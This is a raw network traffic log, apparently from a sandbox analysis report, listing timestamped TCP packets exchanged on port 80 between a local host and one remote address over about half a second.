Dec 19, 2024 10:10:11.965192080 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.965230942 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.966197968 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.966243982 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.966290951 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.966330051 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.967370033 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.967415094 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.967474937 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.967518091 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.968997002 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.969014883 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.969041109 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.969054937 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.969605923 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.969649076 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.969688892 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.969733000 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.970753908 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.970796108 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.970843077 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.970885038 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.974611044 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.974628925 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.974646091 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.974658966 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.974682093 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.974689960 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.974745989 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.974764109 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.974788904 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.974802017 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.974925041 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.974968910 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.976119995 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.976161957 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.105542898 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.105561018 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.105670929 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.105716944 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.105869055 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.106021881 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.106070042 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.106758118 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.106802940 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.106817007 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.106861115 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.107656002 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.107707977 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.107836962 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.107887030 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.108645916 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.108695030 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.108818054 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.108861923 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.109988928 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.110033035 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.110172033 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.110215902 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.111335993 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.111382008 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.111464024 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.111507893 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.112524986 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.112569094 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.112607956 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.112651110 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.113589048 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.113631010 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.113730907 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.113774061 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.114603996 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.114646912 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.114753008 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.114795923 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.115641117 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.115685940 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.115742922 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.115791082 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.116631985 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.116676092 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.116755009 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.116796970 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.117557049 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.117605925 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.117654085 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.118535042 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.118581057 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.118618965 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.118663073 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.119353056 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.119402885 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.119465113 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.119508028 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.120302916 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.120331049 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.120347023 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.120371103 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.121186018 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.121231079 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.121273994 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.121324062 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.122509956 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.122560978 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.122662067 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.122706890 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.123662949 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.123706102 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.123841047 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.123883963 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.124901056 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.124946117 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.125135899 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.125180006 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.125991106 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.126033068 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.126075983 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.126117945 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.126919985 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.126965046 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.127052069 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.127096891 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.128000975 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.128046989 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.128068924 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.128112078 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.128968000 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.129013062 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.129076958 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.129117966 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.129915953 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.129957914 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.130038023 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.130080938 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.130896091 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.130939007 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.131077051 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.131120920 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.131953955 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.131997108 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.132132053 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.132174015 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.133147001 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.133200884 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.133234024 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.133275032 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.134115934 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.134131908 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.134160042 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.134171963 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.135072947 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.135118961 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.135143995 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.135189056 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.136046886 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.136092901 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.136096954 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.136137009 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.136933088 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.136979103 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.137049913 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.137094021 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.137890100 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.137934923 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.137978077 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.138020992 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.138938904 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.138982058 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.139014006 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.139059067 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.139924049 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.139967918 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.140010118 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.140052080 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.141217947 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.141261101 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.141298056 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.141340017 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.142165899 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.142210960 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.142256975 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.142301083 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.143193960 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.143240929 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.143363953 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.143409014 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.144253969 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.144298077 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.144375086 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.144417048 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.145040035 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.145083904 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.145176888 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.145219088 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.145833969 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.145878077 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.145952940 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.145991087 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.146749020 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.146792889 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.146821976 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.146866083 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.147635937 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.147680044 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.147819996 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.147861958 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.148639917 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.148684978 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.148742914 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.148804903 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.149508953 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.149555922 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.149583101 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.149626017 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.150381088 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.150424957 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.150481939 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.150522947 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.151081085 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.151124001 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.151160955 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.151204109 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.151823044 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.151865959 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.151910067 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.151953936 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.152525902 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.152551889 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.152568102 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.152591944 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.153422117 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.153469086 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.153572083 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.153614998 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.154433966 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.154479027 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.154520988 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.154563904 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.155416012 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.155459881 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.155498028 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.155539989 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.156455040 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.156471014 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.156498909 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.156512022 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.157417059 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.157463074 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.297755003 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.297777891 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.297955036 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.298082113 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.298121929 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.298245907 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.298245907 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.298758030 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.298804045 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.298876047 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.298921108 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.299709082 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.299755096 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.299892902 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.299937963 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.300723076 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.300774097 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.300931931 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.300976992 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.301759005 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.301804066 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.301811934 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.301856041 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.302791119 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.302840948 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.302890062 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.302934885 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.303720951 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.303766966 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.303859949 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.303904057 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.304688931 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.304733992 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.304864883 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.304908037 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.305699110 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.305743933 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.305808067 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.305856943 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.306674957 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.306724072 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.306767941 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.306811094 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.307719946 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.307765961 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.307811975 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.307854891 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.308830023 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.308876038 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.308960915 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.309005976 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.309803009 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.309848070 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.309885979 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.309927940 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.310695887 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.310741901 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.310787916 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.310832977 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.311773062 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.311816931 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.311820984 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.311865091 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.312849998 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.312890053 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.312937021 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.312980890 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.314001083 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.314050913 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.314146042 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.314189911 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.315272093 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.315320015 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.315531015 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.315577984 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.316623926 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.316664934 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.316749096 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.316792011 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.317851067 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.317869902 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.317895889 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.317909956 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.318913937 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.318957090 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.318998098 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.319041967 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.319684029 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.319727898 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.319808006 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.319849014 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.320727110 CET	80	49860	185.215.113.16	192.168.2.6
